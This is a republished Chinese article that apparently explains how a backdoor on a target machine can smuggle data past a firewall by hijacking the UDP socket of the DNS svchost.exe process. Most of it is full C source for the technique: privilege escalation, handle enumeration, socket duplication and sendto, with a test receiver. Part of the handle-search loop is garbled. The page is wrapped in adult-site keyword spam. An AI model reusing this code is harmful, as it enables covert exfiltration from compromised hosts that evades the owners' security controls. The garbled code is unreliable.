国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

一種新的穿透防火墻的數(shù)據(jù)傳輸技術(shù)
2007-01-04   

使用該技術(shù)背景:

在目標(biāo)主機安放后門,需要將數(shù)據(jù)傳輸出去,同時數(shù)據(jù)很重要,動作不能太大。其他情況“嚴(yán)重”不推薦使用該技術(shù)(后面我會講到為什么)。

針對目前防火墻的一些情況,如果自己的進(jìn)程開一個端口(甚至是新建套接字)肯定被攔。相反,有一點我們也很清楚:被防火墻驗證的進(jìn)程在傳送數(shù)據(jù)時永遠(yuǎn)不會被攔。所以,我的思路很簡單:將其他進(jìn)程中允許數(shù)據(jù)傳輸?shù)奶捉幼志浔脼橐延谩?

過程如下: 

1. 找出目標(biāo)進(jìn)程
2. 找出SOCKET句柄
2. 用DuplicateHandle()函數(shù)將其SOCKET轉(zhuǎn)換為能被自己使用
3. 用轉(zhuǎn)換后的SOCKET進(jìn)行數(shù)據(jù)傳輸

上面的過程寫的很簡單,但是實際實現(xiàn)起來還是存在一些問題(后面再做討論),而且從上面的實現(xiàn)方法也可以看出一些不爽的地方:在目標(biāo)進(jìn)程的SOCKET不能是TCP,因為TCP的句柄已經(jīng)跟外面建立了連接,所以只能是UDP。針對不同系統(tǒng)不同進(jìn)程我們很難定位一個穩(wěn)定的進(jìn)程SOCKET。

看到上面這些,你有點喪氣了對不對,哈哈。 再想一想,其實我們有一條真正的通羅馬的“黃金大道”。

我們知道只要一臺計算機連上了網(wǎng)絡(luò),那么有一種數(shù)據(jù)傳輸是肯定不會被攔截的,那就是DNS。你能想像域名解析數(shù)據(jù)都被攔了造成的結(jié)果嗎? 嘿嘿, 既然這個是永遠(yuǎn)不會被攔的, 而且它又是UDP傳輸, 我們就拿他開刀。

下面是通過直接控制DNS進(jìn)程(其實也就是svchost.exe,不過對應(yīng)用戶名是NETWORK SERVICE)進(jìn)行數(shù)據(jù)傳輸?shù)睦印>幊讨谐霈F(xiàn)了很多問題,比方說獲取svchost對應(yīng)用戶名時沒有權(quán)限(但是能夠操作LOCAL SERVICE),在句柄值為0x2c時進(jìn)行g(shù)etsockname時會停止運行等等。具體解決方法請細(xì)看注釋部分。 

CODE:
/*++

Made By ZwelL
[email]zwell@sohu.com[/email]
2005.4.12
--*/

#include 
#include 
#include 

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "wtsapi32")

#define NT_SUCCESS(status)       ((NTSTATUS)(status)>=0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef LONG   NTSTATUS;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
  ULONG         ProcessId;
  UCHAR         ObjectTypeNumber;
  UCHAR         Flags;
  USHORT         Handle;
  PVOID         Object;
  ACCESS_MASK     GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

BOOL LocateNtdllEntry ( void )
{
  BOOL   ret       = FALSE;
  char   NTDLL_DLL[] = "ntdll.dll";
  HMODULE ntdll_dll   = NULL;


  if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )
  {
    printf( "GetModuleHandle() failed");
    return( FALSE );
  }
  if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress
( ntdll_dll, "ZwQuerySystemInformation" ) ) )
  {
    goto LocateNtdllEntry_exit;
  }
  ret = TRUE;

LocateNtdllEntry_exit:

  if ( FALSE == ret )
  {
    printf( "GetProcAddress() failed");
  }
  ntdll_dll = NULL;
  return( ret );
}


/*++
This routine is used to get a process's username from it's SID
--*/
BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)
{
  // sanity checks and default value
  if (pUserSid == NULL)
    return false;
  strcpy(szUserName, "?");

  SID_NAME_USE   snu;
  TCHAR       szUser[_MAX_PATH];
  DWORD       chUser = _MAX_PATH;
  PDWORD       pcchUser = &chUser; 
  TCHAR       szDomain[_MAX_PATH];
  DWORD       chDomain = _MAX_PATH;
  PDWORD       pcchDomain = &chDomain;

  // Retrieve user name and domain name based on user's SID.
  if (
    ::LookupAccountSid(
    NULL, 
    pUserSid, 
    szUser, 
    pcchUser, 
    szDomain, 
    pcchDomain, 
    &snu
    )
    )
  {
    wsprintf(szUserName, "%s", szUser);
  }
  else
  {
    return false;
  }

  return true;
} 


/*++

This routine is used to get the DNS process's Id

Here, I use WTSEnumerateProcesses to get process user Sid, 
and then get the process user name. Beacause as it's a "NETWORK SERVICE", 
we cann't use OpenProcessToken to catch the DNS process's token information,
even if we has the privilege in catching the SYSTEM's.

--*/
DWORD GetDNSProcessId()
{
  PWTS_PROCESS_INFO pProcessInfo = NULL;
  DWORD         ProcessCount = 0;
  char         szUserName[255];
  DWORD         Id = -1;

  if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))
  {
    // dump each process description
    for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)
    {

        if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )
        {
          GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);
          if( strcmp(szUserName, "NETWORK SERVICE") == 0)
          {
            Id = pProcessInfo[CurrentProcess].ProcessId;
            break;
          }
        }
    }

    WTSFreeMemory(pProcessInfo);
  }

  return Id;
}


/*++
This doesn't work as we know, sign...
but you can use the routine for other useing...
--*/
/*
BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)
{
  HANDLE hProcess = NULL, 
        hAccessToken = NULL;
  TCHAR InfoBuffer[1000], szDomainName[200];
  PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
  DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;
  SID_NAME_USE snu;

  hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);
  if(hProcess == NULL)
  {
    printf("OpenProcess wrong");
    CloseHandle(hProcess);
    return false;
  }

  if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))
  {
    printf("OpenProcessToken wrong:%08x", GetLastError());
    return false;
  }

  GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,
    1000, &dwInfoBufferSize);

  LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,
    &dwAccountSize,szDomainName, &dwDomainSize, &snu);

  if(hProcess)
    CloseHandle(hProcess);
  if(hAccessToken)
    CloseHandle(hAccessToken);
  return true;
}*/


/*++
Now, it is the most important stuff... ^_^
--*/
SOCKET GetSocketFromId (DWORD PID)
{
  NTSTATUS               status;
  PVOID                 buf   = NULL;
  ULONG                 size = 1;
  ULONG                 NumOfHandle = 0;
  ULONG                 i;
  PSYSTEM_HANDLE_INFORMATION   h_info = NULL;
  HANDLE   sock = NULL;
  DWORD   n;

  buf=malloc(0x1000);
  if(buf == NULL)
  {
    printf("malloc wrong\n");
    return NULL;
  }
  status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );
  if(STATUS_INFO_LENGTH_MISMATCH == status)
  {
    free(buf);
    buf=malloc(n);
    if(buf == NULL)
    {
        printf("malloc wrong\n");
        return NULL;
    }
    status = ZwQuerySystemInformation( 0x10, buf, n, NULL);
  }
  else
  {
    printf("ZwQuerySystemInformation wrong\n");
    return NULL;
  }

  NumOfHandle = *(ULONG*)buf;

  h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

  for(i = 0; i0)   // if port > 0, then we can use it
            break;
        }
    }
    catch(...)
    {
        continue;
    }
  }

  if ( buf != NULL )
  {
    free( buf );
  }
  return (SOCKET)sock;
}


/*++
This is not required...
--*/
BOOL EnablePrivilege (PCSTR name)
{
  HANDLE hToken;
  BOOL rv;

  TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };
  LookupPrivilegeValue (
    0,
    name,
    &priv.Privileges[0].Luid
    );

  priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

  OpenProcessToken(
    GetCurrentProcess (),
    TOKEN_ADJUST_PRIVILEGES,
    &hToken
    );

  AdjustTokenPrivileges (
    hToken,
    FALSE,
    &priv,
    sizeof priv,
    0,
    0
    );

  rv = GetLastError () == ERROR_SUCCESS;

  CloseHandle (hToken);
  return rv;
}

void main() 
{
  WSADATA wsaData;
  char   testbuf[255];
  SOCKET   sock;
  sockaddr_in RecvAddr;

  int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
  if (iResult != NO_ERROR)
    printf("Error at WSAStartup()\n");

  if(!LocateNtdllEntry())
    return;

  if(!EnablePrivilege (SE_DEBUG_NAME))
  {
    printf("EnablePrivilege wrong\n");
    return;
  }

  sock = GetSocketFromId(GetDNSProcessId());
  if( sock==NULL)
  {
    printf("GetSocketFromId wrong\n");
    return;
  }

  //Change there value...
  RecvAddr.sin_family = AF_INET;
  RecvAddr.sin_port = htons(5555); 
  RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1");

  if(SOCKET_ERROR == sendto(sock, 
        "test", 
        5, 
        0, 
        (SOCKADDR *) &RecvAddr, 
        sizeof(RecvAddr)))
  {
    printf("sendto wrong:%d\n", WSAGetLastError());
  }
  else
  {
    printf("send ok... Have fun, right? ^_^\n");
  }
  
  getchar();

  //WSACleanup();
  return;
}
[Copy to clipboard]

很早以前我就有這個想法了,只是一直沒有去實現(xiàn)。在上面的代碼中,因為要找出DNS進(jìn)程句柄,而svchost.exe又有多個,所以以用戶名來進(jìn)行判斷,本來是用OpenProcessToken,但是怎么也不行。所以換個方法,用到了wtsapi32庫函數(shù)。

再用下面的代碼測試: 

CODE:
/*++
UdpReceiver
--*/
#include 
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

void main() 
{
WSADATA wsaData;
SOCKET RecvSocket;
sockaddr_in RecvAddr;
int Port = 5555;
char RecvBuf[1024];
int BufLen = 1024;
sockaddr_in SenderAddr;
int SenderAddrSize = sizeof(SenderAddr);

//-----------------------------------------------
// Initialize Winsock
WSAStartup(MAKEWORD(2,2), &wsaData);

//-----------------------------------------------
// Create a receiver socket to receive datagrams
RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

//-----------------------------------------------
// Bind the socket to any address and the specified port.
RecvAddr.sin_family = AF_INET;
RecvAddr.sin_port = htons(Port);
RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);

bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr));

//-----------------------------------------------
// Call the recvfrom function to receive datagrams
// on the bound socket.
printf("Receiving datagrams...\n");
while(1)
{
  recvfrom(RecvSocket, 
    RecvBuf, 
    BufLen, 
    0, 
    (SOCKADDR *)&SenderAddr, 
    &SenderAddrSize);
  printf("%s\n", RecvBuf);
}

//-----------------------------------------------
// Close the socket when finished receiving datagrams
printf("Finished receiving. Closing socket.\n");
closesocket(RecvSocket);

//-----------------------------------------------
// Clean up and exit.
printf("Exiting.\n");
WSACleanup();
return;
}
[Copy to clipboard]

測試步驟:

1. 在一臺機器上執(zhí)行UdpReceiver。

2. 在安裝防火墻的機器上執(zhí)行第一個程序。

責(zé)任編輯 趙毅 zhaoyi#51cto.com TEL:(010)68476636-8001


熱詞搜索:

上一篇:系統(tǒng)安全系列之ASP漏洞全接觸入門篇
下一篇:保護(hù)系統(tǒng) 用數(shù)據(jù)庫加密實現(xiàn)數(shù)據(jù)安全

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
精品国产sm最大网站| 欧美精品在线视频| 六月丁香综合在线视频| 亚洲成人动漫av| 中文字幕在线不卡国产视频| 久久综合九色综合欧美就去吻| 欧美一区二区女人| 欧美一级免费观看| 日韩欧美中文字幕公布| 久久亚洲一级片| 国产女人水真多18毛片18精品视频| 久久久久久久电影| 亚洲欧美欧美一区二区三区| 亚洲女与黑人做爰| 婷婷丁香激情综合| 国产乱国产乱300精品| 成人a区在线观看| 欧洲生活片亚洲生活在线观看| 在线观看国产一区二区| 91精品国产一区二区三区蜜臀| 日韩免费性生活视频播放| 久久亚洲二区三区| 亚洲视频小说图片| 三级成人在线视频| 国产91丝袜在线观看| 91精品1区2区| 日韩写真欧美这视频| 国产丝袜欧美中文另类| 亚洲综合无码一区二区| 免费观看日韩电影| 成人av小说网| 在线观看91av| 国产精品欧美一区喷水| 亚洲动漫第一页| 国产成人av在线影院| 在线视频欧美区| 久久日韩精品一区二区五区| 亚洲综合一区二区三区| 国产高清在线观看免费不卡| 91一区在线观看| 欧美手机在线视频| 欧美极品美女视频| 免费久久99精品国产| 99国产精品久久| 日韩免费高清视频| 亚洲精品免费视频| 国产精品影视在线观看| 欧美性淫爽ww久久久久无| 久久精品人人做人人综合| 午夜久久久影院| 99久久99久久久精品齐齐| 精品国产91乱码一区二区三区| 国产精品不卡一区| 精品无人码麻豆乱码1区2区| 欧美日韩一区不卡| 一二三区精品视频| 成人免费电影视频| 2022国产精品视频| 免费不卡在线视频| 欧美日韩国产一区| 亚洲在线视频网站| 在线观看一区二区视频| 自拍偷在线精品自拍偷无码专区| 韩国毛片一区二区三区| 91精品国产福利| 午夜成人免费视频| 欧美体内she精高潮| 一区二区三区在线观看欧美| 91影视在线播放| 中文字幕中文在线不卡住| 高清不卡一区二区| 国产调教视频一区| 高清不卡一二三区| 国产精品三级视频| 不卡av电影在线播放| 国产精品美女一区二区三区| 激情欧美一区二区三区在线观看| 欧美大片一区二区| 国内精品免费在线观看| 欧美tickling挠脚心丨vk| 精品在线你懂的| 精品sm捆绑视频| 国产精品一区在线| 日本一区二区视频在线观看| 成人午夜精品一区二区三区| 国产精品九色蝌蚪自拍| 在线视频你懂得一区二区三区| 一区二区三区四区蜜桃| 欧美日韩在线观看一区二区| 亚洲h在线观看| 日韩精品自拍偷拍| 国产精品一区在线| 亚洲免费观看高清| 777xxx欧美| 国产精品一区三区| 国产精品丝袜一区| av亚洲精华国产精华| 一二三区精品福利视频| 日韩欧美色综合| 不卡在线观看av| 亚洲成人三级小说| 久久亚洲影视婷婷| 欧洲视频一区二区| 国产老肥熟一区二区三区| 国产精品每日更新在线播放网址| 色综合久久中文综合久久牛| 天天色天天爱天天射综合| 久久精品亚洲乱码伦伦中文| 色婷婷精品大视频在线蜜桃视频| 日本vs亚洲vs韩国一区三区二区| 久久久久综合网| 91极品美女在线| 国产尤物一区二区| 亚洲午夜激情网站| 国产精品人人做人人爽人人添| 欧美视频一区二区三区四区| 韩国精品在线观看| 午夜精品一区在线观看| 欧美国产精品专区| 日韩一区二区在线观看| 99麻豆久久久国产精品免费优播| 日本不卡一二三区黄网| 亚洲理论在线观看| 国产欧美日韩在线观看| 欧美一区二区三区四区视频| 99国产精品久久久| 国产一区欧美二区| 天堂影院一区二区| 亚洲天堂久久久久久久| 26uuuu精品一区二区| 欧美一区二区三区视频在线观看 | 精品日韩欧美一区二区| 欧美日韩成人综合在线一区二区| 成人在线综合网| 韩日欧美一区二区三区| 日韩中文字幕麻豆| 亚洲制服丝袜av| 最新中文字幕一区二区三区| 精品不卡在线视频| 日韩亚洲国产中文字幕欧美| 884aa四虎影成人精品一区| 在线国产亚洲欧美| 91福利视频在线| 色婷婷精品大视频在线蜜桃视频| 成人免费高清在线| 国产精品羞羞答答xxdd| 狠狠v欧美v日韩v亚洲ⅴ| 免费人成黄页网站在线一区二区| 亚洲电影一级片| 丝袜亚洲另类丝袜在线| 亚洲精品第1页| 中文字幕日韩精品一区| 国产精品久久久久久久久搜平片 | 亚洲日本在线观看| 国产精品成人免费| 亚洲日本乱码在线观看| 亚洲人成7777| 亚洲自拍欧美精品| 亚洲图片欧美视频| 性欧美大战久久久久久久久| 天堂av在线一区| 另类小说综合欧美亚洲| 蜜臀av一区二区| 国产一区二区不卡| 成人一区二区三区| 色偷偷成人一区二区三区91| 在线精品视频免费播放| 9191精品国产综合久久久久久| 欧美一区二区国产| 久久免费国产精品| 中文一区在线播放 | 欧美日韩另类一区| 91精品综合久久久久久| 欧美tickling挠脚心丨vk| 国产午夜亚洲精品羞羞网站| 国产精品国产三级国产a| 亚洲免费大片在线观看| 无吗不卡中文字幕| 国产精品伊人色| 日本精品免费观看高清观看| 欧美一区二区三区色| 欧美国产精品一区二区| 亚洲美女免费视频| 久久99久久精品| 99re8在线精品视频免费播放| 欧美日韩亚洲高清一区二区| 精品国产凹凸成av人网站| 国产精品福利在线播放| 五月婷婷久久丁香| 国产精品资源网站| 欧美日韩一区二区电影| 国产亚洲制服色| 香蕉加勒比综合久久| 国产很黄免费观看久久| 欧美天堂一区二区三区| 欧美激情在线一区二区| 天涯成人国产亚洲精品一区av| 国产91精品久久久久久久网曝门 | 国产精品一区一区三区| 欧美日韩美少妇|